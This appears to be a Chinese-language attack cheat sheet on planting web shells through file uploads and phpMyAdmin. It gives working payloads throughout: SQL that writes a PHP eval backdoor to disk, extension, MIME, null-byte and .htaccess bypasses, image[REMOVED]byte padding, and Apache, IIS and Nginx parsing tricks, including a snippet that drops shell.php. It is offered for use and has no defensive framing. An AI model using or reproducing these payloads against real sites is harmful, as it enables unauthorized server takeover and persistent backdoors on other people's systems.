一、正常上传
织梦cms ,谷歌关键字powered by dedecms, 根据版本找漏洞。
二、数据库备份
良通精用cms,上传一个带马的图片然后数据库备份为.asp或.php文件
三、配置文件插马
这个最好有一个网站源码测试,不然容易把网站搞坏。在有源码的情况下可以结合findstr /s命令找到网站配置文件位置。
四、数据库命令管理拿shell
常见的phpmyadmin后台,暴力破解用户名密码。
create table xxx (cmd text NOT NULL)
insert into xxx (cmd) values ('<?php eval($_POST[xx]);?>')
select cmd from xxx into outfile 'e:/phpstudy/www/xx.php'
drop table if exits xxx
五、客户端检测绕过(javascript检测)
检测脚本在本地,在没有上传到服务器时,就拒绝。 上传一个正常的后缀,然后burp抓包,改包上传。
六、服务端检测绕过(MIME类型检测)
服务端检测上传文件的类型 上传图片马,或者,burp抓包改content-type:image/gif
七、服务器端检测绕过(目录路径检测)
因为对目录路径的检测不够严谨导致可以用0x00截断攻击 例如: fckeditor264/filemanager/connectors/php/connector.php?Command=fileupload&type=image¤tfolder=xxx.php%00.fig
八、服务端检测绕过(文件扩展名检测)
1.大小写绕过
2.名单列表绕过,如php2、php3、php5、phtml、asp、aspx、ascx、
ashx、cer、asa、jsp、jspx、cdx
3.特殊文件名绕过
burp抓包,修改文件名test.asp.或test.asp* (*为空格)适用于windows服务器因为这种命名windows不允许。
4.0×00截断绕过
5.htaccess文件攻击
配和名单列表绕过,上传一个自定义的.htaccess覆盖原有的文件,,绕过检测。 通过下面代码就可以解析xxx.jpg文件 <FilesMatch “xxx.jpg”> SetHandler application/x-httpd-php </FilesMatch>
6 .解析漏洞绕过详见“十”
九、服务端检测绕过(文件内容检测)
1.文件幻数检测
在一句话木马后面加上文件幻数 或者图片马 Jpg : FF D8 FF E0 00 10 4A 46 49 46 Gif :47 49 46 38 39 61 Png :89594447
2.文件信息检测
这个检测的更多,文件幻数后面加其他内容。 利用方法:图片马,或者在文件幻数后面加更多东西
十、解析漏洞:
1.Apache解析漏洞
版本2.0.59,2.2.6,2.2.8,2.2.11,2.2.17 文件扩展名从后往前解析
2.iis6.0解析漏洞
.asa、.cer、.cdx会被解析为asp 目录文件夹保护”.asp”字符串,这个文件夹下所有文件都会按asp解析。 文件名中含有”.asp;”,会优先按asp来解析,上传xx.asp;jpg。
3.iis7.0、7.5(php-cgi)
在URL后面追加字符串“/任意文件名.php”就好按php的方式解析
如:在默认Fast-CGI开启状况下,上传一个名字为wooyun.jpg,内容为
<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
然后访问wooyun.jpg/x.php,在这个目录下就会生成一句话木马 shell.php
4.Nginx解析漏洞(php-cgi)
版本:0.5*,0.6*,0.7-0.7.65,0.8-0.8.37(与iss7.0漏洞相似) 任意文件名/任意文件名.php 任意文件名%00.php

